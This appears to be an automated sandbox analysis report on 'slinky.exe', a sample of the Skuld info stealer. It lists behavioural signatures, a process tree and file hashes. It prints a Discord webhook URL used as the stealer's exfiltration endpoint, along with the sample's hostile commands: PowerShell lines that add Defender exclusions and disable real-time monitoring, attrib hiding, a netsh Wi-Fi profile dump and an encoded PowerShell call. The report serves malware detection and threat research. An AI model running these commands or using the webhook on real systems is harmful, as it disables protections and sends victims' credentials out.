Analysis

  • max time kernel
    98s
  • max time network
    97s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240802-en
  • resource tags

    arch:x64 arch:x86 image:win10v2004-20240802-en locale:en-us os:windows10-2004-x64 system
  • submitted
    08-08-2024 14:55

General

Malware Config

Extracted

Family

skuld

C2

https://ptb.discord.com/api/webhooks/1267444280629133384/93lgPC5prxwm7kfEOYzZT9pM4aGa5M70dJhLbOvmKWx-H6EKIXoR_k1Z9HoM8VPO8jTA

Signatures

  • Skuld stealer

    An info stealer written in Go.

  • Credentials from Password Stores: Credentials from Web Browsers 1 TTPs

    Malicious access to, or copying of, the web browser credential store.

  • Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

    Runs PowerShell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

  • Drops file in Drivers directory 3 IoCs
  • Executes dropped EXE 1 IoCs
  • Reads user/profile data of local email clients 2 TTPs

    Email clients store some user data on disk where infostealers will often target it.

  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Unsecured Credentials: Credentials In Files 1 TTPs

    Steals credentials from unsecured files.

  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 1 IoCs
  • Looks up external IP address via web service 3 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Maps connected drives based on registry 3 TTPs 2 IoCs

    Disk information is often read in order to detect sandboxing environments.

  • Obfuscated Files or Information: Command Obfuscation 1 TTPs

    Adversaries may obfuscate content during command execution to impede detection.

  • Browser Information Discovery 1 TTPs

    Enumerates browser information.

  • Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs

    Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

  • System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 1 IoCs

    Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.

  • Detects videocard installed 1 TTPs 2 IoCs

    Uses WMIC.exe to determine the installed video card.

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • GoLang User-Agent 1 IoCs

    Uses default user-agent string defined by GoLang HTTP packages.

  • Modifies registry class 1 IoCs
  • Modifies system certificate store 2 TTPs 5 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 13 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 35 IoCs
  • Suspicious use of SendNotifyMessage 24 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Views/modifies file attributes 1 TTPs 4 IoCs

Processes

  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://youtube.com
    1⤵
    • Enumerates system info in registry
    • Modifies registry class
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SendNotifyMessage
    • Suspicious use of WriteProcessMemory
    PID:3780
    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffa579246f8,0x7ffa57924708,0x7ffa57924718
      2⤵
        PID:1256
      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2024,5365840182909911623,11709372031132929779,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2072 /prefetch:2
        2⤵
          PID:5052
        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2024,5365840182909911623,11709372031132929779,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2184 /prefetch:3
          2⤵
          • Suspicious behavior: EnumeratesProcesses
          PID:4872
        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2024,5365840182909911623,11709372031132929779,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2884 /prefetch:8
          2⤵
            PID:4612
          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2024,5365840182909911623,11709372031132929779,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3216 /prefetch:1
            2⤵
              PID:5032
            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2024,5365840182909911623,11709372031132929779,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3224 /prefetch:1
              2⤵
                PID:988
              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2024,5365840182909911623,11709372031132929779,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4860 /prefetch:1
                2⤵
                  PID:3508
                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2024,5365840182909911623,11709372031132929779,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5072 /prefetch:1
                  2⤵
                    PID:3988
                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --field-trial-handle=2024,5365840182909911623,11709372031132929779,131072 --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=4652 /prefetch:8
                    2⤵
                      PID:4764
                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=2024,5365840182909911623,11709372031132929779,131072 --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=5284 /prefetch:8
                      2⤵
                        PID:2696
                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2024,5365840182909911623,11709372031132929779,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4884 /prefetch:1
                        2⤵
                          PID:1560
                        • C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
                          "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2024,5365840182909911623,11709372031132929779,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5932 /prefetch:8
                          2⤵
                            PID:2264
                          • C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
                            "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2024,5365840182909911623,11709372031132929779,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5932 /prefetch:8
                            2⤵
                            • Suspicious behavior: EnumeratesProcesses
                            PID:5076
                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2024,5365840182909911623,11709372031132929779,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5608 /prefetch:1
                            2⤵
                              PID:4028
                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2024,5365840182909911623,11709372031132929779,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5388 /prefetch:1
                              2⤵
                                PID:2960
                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2024,5365840182909911623,11709372031132929779,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4124 /prefetch:1
                                2⤵
                                  PID:628
                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2024,5365840182909911623,11709372031132929779,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6088 /prefetch:1
                                  2⤵
                                    PID:2752
                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2024,5365840182909911623,11709372031132929779,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6072 /prefetch:1
                                    2⤵
                                      PID:2160
                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2024,5365840182909911623,11709372031132929779,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6056 /prefetch:1
                                      2⤵
                                        PID:3728
                                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2024,5365840182909911623,11709372031132929779,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6080 /prefetch:1
                                        2⤵
                                          PID:4476
                                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=2024,5365840182909911623,11709372031132929779,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=5192 /prefetch:8
                                          2⤵
                                            PID:3824
                                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2024,5365840182909911623,11709372031132929779,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=22 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6496 /prefetch:1
                                            2⤵
                                              PID:988
                                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2024,5365840182909911623,11709372031132929779,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6612 /prefetch:8
                                              2⤵
                                              • Suspicious behavior: EnumeratesProcesses
                                              PID:1020
                                          • C:\Windows\System32\CompPkgSrv.exe
                                            C:\Windows\System32\CompPkgSrv.exe -Embedding
                                            1⤵
                                              PID:2476
                                            • C:\Windows\System32\CompPkgSrv.exe
                                              C:\Windows\System32\CompPkgSrv.exe -Embedding
                                              1⤵
                                                PID:2120
                                              • C:\Windows\system32\AUDIODG.EXE
                                                C:\Windows\system32\AUDIODG.EXE 0x49c 0x420
                                                1⤵
                                                • Suspicious use of AdjustPrivilegeToken
                                                PID:3652
                                              • C:\Windows\System32\CompPkgSrv.exe
                                                C:\Windows\System32\CompPkgSrv.exe -Embedding
                                                1⤵
                                                  PID:392
                                                • C:\Windows\System32\rundll32.exe
                                                  C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
                                                  1⤵
                                                    PID:1444
                                                  • C:\Program Files\7-Zip\7zG.exe
                                                    "C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Downloads\slinky\" -spe -an -ai#7zMap7897:74:7zEvent31753
                                                    1⤵
                                                    • Suspicious use of AdjustPrivilegeToken
                                                    • Suspicious use of FindShellTrayWindow
                                                    PID:4844
                                                  • C:\Users\Admin\Desktop\slinky\slinky.exe
                                                    "C:\Users\Admin\Desktop\slinky\slinky.exe"
                                                    1⤵
                                                    • Drops file in Drivers directory
                                                    • Executes dropped EXE
                                                    • Adds Run key to start application
                                                    • Maps connected drives based on registry
                                                    • Modifies system certificate store
                                                    • Suspicious behavior: EnumeratesProcesses
                                                    • Suspicious use of AdjustPrivilegeToken
                                                    PID:4920
                                                    • C:\Windows\system32\attrib.exe
                                                      attrib +h +s C:\Users\Admin\Desktop\slinky\slinky.exe
                                                      2⤵
                                                      • Views/modifies file attributes
                                                      PID:1096
                                                    • C:\Windows\system32\attrib.exe
                                                      attrib +h +s C:\Users\Admin\AppData\Roaming\Microsoft\Protect\SecurityHealthSystray.exe
                                                      2⤵
                                                      • Views/modifies file attributes
                                                      PID:4752
                                                    • C:\Windows\System32\Wbem\wmic.exe
                                                      wmic csproduct get UUID
                                                      2⤵
                                                      • Suspicious use of AdjustPrivilegeToken
                                                      PID:3048
                                                    • C:\Windows\System32\Wbem\wmic.exe
                                                      wmic path win32_VideoController get name
                                                      2⤵
                                                      • Detects videocard installed
                                                      • Suspicious use of AdjustPrivilegeToken
                                                      PID:3608
                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      powershell -Command Add-MpPreference -ExclusionPath C:\Users\Admin\Desktop\slinky\slinky.exe
                                                      2⤵
                                                      • Command and Scripting Interpreter: PowerShell
                                                      • Suspicious behavior: EnumeratesProcesses
                                                      PID:3076
                                                    • C:\Windows\System32\Wbem\wmic.exe
                                                      wmic os get Caption
                                                      2⤵
                                                        PID:2220
                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                        powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
                                                        2⤵
                                                        • Command and Scripting Interpreter: PowerShell
                                                        • Suspicious behavior: EnumeratesProcesses
                                                        PID:3068
                                                      • C:\Windows\System32\Wbem\wmic.exe
                                                        wmic cpu get Name
                                                        2⤵
                                                          PID:3284
                                                        • C:\Windows\System32\Wbem\wmic.exe
                                                          wmic path win32_VideoController get name
                                                          2⤵
                                                          • Detects videocard installed
                                                          PID:312
                                                        • C:\Windows\System32\Wbem\wmic.exe
                                                          wmic csproduct get UUID
                                                          2⤵
                                                            PID:4564
                                                          • C:\Windows\system32\attrib.exe
                                                            attrib -r C:\Windows\System32\drivers\etc\hosts
                                                            2⤵
                                                            • Drops file in Drivers directory
                                                            • Views/modifies file attributes
                                                            PID:1184
                                                          • C:\Windows\system32\attrib.exe
                                                            attrib +r C:\Windows\System32\drivers\etc\hosts
                                                            2⤵
                                                            • Drops file in Drivers directory
                                                            • Views/modifies file attributes
                                                            PID:2292
                                                          • C:\Windows\system32\netsh.exe
                                                            netsh wlan show profiles
                                                            2⤵
                                                            • Event Triggered Execution: Netsh Helper DLL
                                                            • System Network Configuration Discovery: Wi-Fi Discovery
                                                            PID:2856
                                                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand 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
                                                            2⤵
                                                              PID:4000
                                                              • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\u2ylqpnw\u2ylqpnw.cmdline"
                                                                3⤵
                                                                  PID:4112
                                                                  • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                                    C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESCE28.tmp" "c:\Users\Admin\AppData\Local\Temp\u2ylqpnw\CSC291A098498AB4C38BE9CF2141E525A96.TMP"
                                                                    4⤵
                                                                      PID:3168

Network

MITRE ATT&CK Enterprise v15

Downloads


                                                                7781c5280010519da7e71a849a9cb5e37f7b29a1e800bbf9cc47536eaa937abeecd1a2d61867c2744b7de83f0cfdc88b72255ee083501df0455fd018b0f86376

                                                              • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_00000a

                                                                Filesize

                                                                20KB

                                                                MD5

                                                                80f1c7472825e6dd19d7ab65b0984ffb

                                                                SHA1

                                                                76af1427993a5d699b8441a32d751777a91fb0ef

                                                                SHA256

                                                                cc6186b5115525964b454ef070e9034df1d919d806314ee6a2203a2d66b4f7b3

                                                                SHA512

                                                                b0be05f9536efd3ee010afef24fe879aeabe56cd52c877cc23980b8c1742823834f2e9e8c000a78d79b077d0f257dc30bff10b5eb5bfa6d2cd684405bfec7c0f

                                                              • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_00000b

                                                                Filesize

                                                                747KB

                                                                MD5

                                                                caf3270e6712a05fa98d2906767fea61

                                                                SHA1

                                                                dac8ff2f4df3d5f8cb11540a08d526ecdf6276d6

                                                                SHA256

                                                                31fc03c0de46fb6f87bb3ee52ec768a9e707eaedf6d635eae2f53b5cb12beb0c

                                                                SHA512

                                                                dc20a621348b2de52dd542f8f655961e855fef93c2c37d459609cf06d18ea1ce44d7c23406e94a6c2fe05a8361658af9ea9930e59c11a4ba5b7bc2dc37960c63

                                                              • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_00000c

                                                                Filesize

                                                                32KB

                                                                MD5

                                                                3d717fa891fbafdbacf93bfb48918058

                                                                SHA1

                                                                69cf09b669444cbfe0ab7e6aee2a3e59b200aed3

                                                                SHA256

                                                                1c634d8a1954c3773d6a808709d6dbf14d8a20fdf1b52a8394a223ff335cfe8c

                                                                SHA512

                                                                dc335aec55d258b1931bc2a9c9b699ea971f9b0277f9e6b660ad6d4c5c2aeb9d41860e81da94bef9984845bee3d1ab5efd34cbca70820bac3bdf5cbffc97b0f0

                                                              • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_00000d

                                                                Filesize

                                                                32KB

                                                                MD5

                                                                81e8f8281ea972cee3cd3ee2ff4ed42b

                                                                SHA1

                                                                6877e2f5e3c97294610f5d92c53982b3f6db008a

                                                                SHA256

                                                                8a6aea6739ad1bc5c58aa123796b46a9334f2880fc3c3948cd00abc6ed2e5e9c

                                                                SHA512

                                                                615a131732c448342706cc049874cac0ec523271d6c8dfa600a3ba8626ec52c92fbd5ba8ba1ebd2ee51497dc6ef96d433a8d6eda45611cc7b00fe365dbe3b49d

                                                              • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index

                                                                Filesize

                                                                816B

                                                                MD5

                                                                0f56b4a9e0b2e4bd18f1269b6e9af8c9

                                                                SHA1

                                                                87362f1dacf5dc31deddc432edade893a010245a

                                                                SHA256

                                                                1cfc5603f4ab0c48c24984b918edb0673e9a272d3b747aca8a680e9e03489bac

                                                                SHA512

                                                                c901f5d0293dbe1b20bc01a45a18c416749350653692423fe8cacd7505acdf177a1d5aa1bd31a7b81eef6fe19822b68c8b905016a311a1a86b0f26d15e27a602

                                                              • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\File System\000\t\Paths\MANIFEST-000001

                                                                Filesize

                                                                41B

                                                                MD5

                                                                5af87dfd673ba2115e2fcf5cfdb727ab

                                                                SHA1

                                                                d5b5bbf396dc291274584ef71f444f420b6056f1

                                                                SHA256

                                                                f9d31b278e215eb0d0e9cd709edfa037e828f36214ab7906f612160fead4b2b4

                                                                SHA512

                                                                de34583a7dbafe4dd0dc0601e8f6906b9bc6a00c56c9323561204f77abbc0dc9007c480ffe4092ff2f194d54616caf50aecbd4a1e9583cae0c76ad6dd7c2375b

                                                              • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\History

                                                                Filesize

                                                                124KB

                                                                MD5

                                                                6610197858baa49daba50a4ab5ad2dcc

                                                                SHA1

                                                                55709a9f0978dc929eb3898e50426dfac32772c1

                                                                SHA256

                                                                7520c4f198ebf1247cbc754a5c591a4542bfa564100a0abff061ff86189a65bb

                                                                SHA512

                                                                d508003f6bd6fba9d0eb37e573e13ec16138f8e748fed0d34fe62051f70bcc89fd50e591c0815c326f309868711047f52f008bb1f322462879fba90aa18fa9b6

                                                              • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\IndexedDB\https_mega.nz_0.indexeddb.leveldb\MANIFEST-000001

                                                                Filesize

                                                                23B

                                                                MD5

                                                                3fd11ff447c1ee23538dc4d9724427a3

                                                                SHA1

                                                                1335e6f71cc4e3cf7025233523b4760f8893e9c9

                                                                SHA256

                                                                720a78803b84cbcc8eb204d5cf8ea6ee2f693be0ab2124ddf2b81455de02a3ed

                                                                SHA512

                                                                10a3bd3813014eb6f8c2993182e1fa382d745372f8921519e1d25f70d76f08640e84cb8d0b554ccd329a6b4e6de6872328650fefa91f98c3c0cfc204899ee824

                                                              • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb\000003.log

                                                                Filesize

                                                                1KB

                                                                MD5

                                                                cde4d3e52260588b6083e5bf2958ca5b

                                                                SHA1

                                                                de3f8ce3a01853544e9107956d0a66435018fa79

                                                                SHA256

                                                                1a6ef367e19f8dbb958d1575898826a74eda6136aba2fbefc13936b1779a332d

                                                                SHA512

                                                                5f19a3bb8b8475ab18f84b6adf95e83dbb75a6ca3db437c151bcd8feae4fb21d1001d8e3fde2cc94217b6b69eb3c430a6459969e7cf68922290c8b7e7e6fe78c

                                                              • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

                                                                Filesize

                                                                3KB

                                                                MD5

                                                                b13fba437a3ad510aea987d8349ad57c

                                                                SHA1

                                                                e7c49cba92901cdd032202a5514d7cf45213b208

                                                                SHA256

                                                                20af9f2c100b9d695bdcefafa318c99b09b8a36ac263f317ef30eaa3f65ab435

                                                                SHA512

                                                                db6eba94344a2609caa2ab51c8702fbb3642834296d69236dcb6ce27a6ac61f4a87683eb10bbc214f6a854703bcb32fdd331e03d3cb3edf21fb198d159c463dd

                                                              • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

                                                                Filesize

                                                                6KB

                                                                MD5

                                                                304ef90b08c7e6fe9d11c0edcc5a8b51

                                                                SHA1

                                                                1b3c33faf459ca076dd2f84dfc8f39562e0b352c

                                                                SHA256

                                                                9e31c6b6a7d4c21460323f8271ef38601753c8ebadfe7f266e5a440bea71d4bc

                                                                SHA512

                                                                b55180179bb7a9b10cca7fc20e28b576e5baf7913b2e25a8eadfa9730c6a7036e1772c36edcaf843d79f75a96272432cb04cb585880685c125c3f69eca4cf1d0

                                                              • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

                                                                Filesize

                                                                7KB

                                                                MD5

                                                                d0c99b901cec1fd0668d3ebd6b3bf2ba

                                                                SHA1

                                                                a77b5689aea8f1829a87add5d0cb8000cbfdba1b

                                                                SHA256

                                                                d94b14625652a417ac795204330306ae19d84e81ca22f14daa6aa95d00b52a1b

                                                                SHA512

                                                                ce4646513b9213aba23ec6f3e14d46e926109506665a5b872fbbc14a6c2e418c81c63bce1744b6b462997896d8ef0b5f3ec30acdd97c2b0bc7053a531016b38e

                                                              • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

                                                                Filesize

                                                                8KB

                                                                MD5

                                                                62909d6074c1fa06e791002a069cb4c1

                                                                SHA1

                                                                30da198bbb173e6bd838358ecf65558413938a59

                                                                SHA256

                                                                be3072d8c5a3e7a9c0b196cd4cb799fe501ebdb63636d796a092d568b0dbfd8d

                                                                SHA512

                                                                1185f60cd9dfc5a2598c37db6c7565083c0d9db30e7226ca9629a500f75207545429875560a298ecb255469962a422692e5305ffcbe618b14a42c15285e037e7

                                                              • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

                                                                Filesize

                                                                7KB

                                                                MD5

                                                                646f0b94650ecf98cf3bbbc49b4832f3

                                                                SHA1

                                                                5bab2e01177a70da8152752e7f9ab13f8e47d50e

                                                                SHA256

                                                                a530fb88694396cad9930d4691375d50223fcb6f684f95b4d4e6672981acc9eb

                                                                SHA512

                                                                355d45c87c6c4ee4c99067a8561fab23f24d3af76be560d06ca310aef9934327824f7382dcbfd826281d05058121819e0fdc3b1005bf79df92bc0300d8c2a195

                                                              • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

                                                                Filesize

                                                                7KB

                                                                MD5

                                                                98e5a95d3b2c13785d620169efa36b6b

                                                                SHA1

                                                                88ec6dcc568ab213a176c715fbde38073ba2fdcb

                                                                SHA256

                                                                27fec60ef60fc9a50b3c90cf9b9f3046712369de5b1e0eaf333ac51635bcb412

                                                                SHA512

                                                                01333aa011edc45e5ab83c5b262f18463d00ddc8d27937db651df1ec5b21a250c9314a0dcef796145035620afbda0c3807269237fa86a7d7a4defd93ed7b021f

                                                              • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\379f1cbab5b08b6fc9e08681e42d8be311441c88\19785922-e24c-4bb1-a01f-c03378ca7e70\index-dir\the-real-index

                                                                Filesize

                                                                624B

                                                                MD5

                                                                81e4f0c3d0f662ddf319df53be8d68f8

                                                                SHA1

                                                                040d234fa4797949357abe9ccfa4f65f688e6dfc

                                                                SHA256

                                                                744c86a8c022fcc929e0fd003bd3fa0f3d4cd041041e5eb68e50ff76412c4fdd

                                                                SHA512

                                                                961a1d783991ae5cf426f774cb942ed4a751ad91aca477ef89b226f07d4a611d88baf72c7893f10fb11b3198d838444411440df15d0a2ecf1ad747bd22474f9d

                                                              • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\379f1cbab5b08b6fc9e08681e42d8be311441c88\19785922-e24c-4bb1-a01f-c03378ca7e70\index-dir\the-real-index~RFe57dacf.TMP

                                                                Filesize

                                                                48B

                                                                MD5

                                                                11363ef54a3598dcd092f626c2dbfcb7

                                                                SHA1

                                                                880f6d855f9c638d3d1befb4c64fdcf0aed019cf

                                                                SHA256

                                                                bb9c4ec023d14e43b56299568ec5006edb6a03a8a7c8e07eaa22389d3d8cd313

                                                                SHA512

